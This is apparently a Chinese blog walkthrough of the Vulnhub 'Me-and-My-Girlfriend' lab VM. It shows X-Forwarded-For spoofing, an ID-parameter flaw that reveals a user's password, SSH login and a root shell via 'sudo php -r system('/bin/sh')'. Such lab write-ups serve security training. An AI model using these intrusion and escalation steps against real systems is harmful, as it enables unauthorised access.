-
Vulnhub Me-and-My-Girlfriend
一、信息收集
1.nmap 端口扫描
发现开发了22、80
2.访问ip,右击查看源代码
发现需要利用X-Forwarded-For
插件:X-Forwarded-For Header
挂上代理后:
出现以下页面:
先注册一个账户,然后再登录
发现有参数进行传参
发现传参,参数为5的时候,出现主角alice
查看密码:把type删掉
发现密码是:4lic3
二、漏洞利用
1.ssh连接
- 账号:alice
- 密码:4lic3
2.flag1
- alice@gfriEND:~$ cd .my_secret/
- alice@gfriEND:~/.my_secret$ ls
- flag1.txt my_notes.txt
- alice@gfriEND:~/.my_secret$ cat flag1.txt
- alice@gfriEND:~/.my_secret$ cat my_notes.txt
三、php回调bash提权
提权网站:
sudo -l 查看哪些可以sudo提权
可以看到有个php有root权限可以利用
3.flag2
- sudo php -r "system('/bin/sh');"
- python3 -c 'import pty; pty.spawn("/bin/bash")' #python交互式shell
-
相关阅读:
过敏婴儿的4大症状 家长要及时发现正确处理很重要
软件设计模式系列之十二——外观模式
了解IO,内外存,文件操作这一篇就够了
MySQL中 any,some,all 的用法
Ubuntu Linux 操作系统-清华大学开源软件镜像站下载
如何打开html格式文件?Win11打开html文件的方法
操作系统 - 看完这篇还读不懂《银行家算法》那我也没办法了
教你java中如何判断代码中异步操作是否完成
ROS机器人应用(6)—— 激光雷达建图和导航
盘点算法比赛中常见的AutoEDA工具库
- 原文地址:https://blog.csdn.net/SENMINGya/article/details/133760572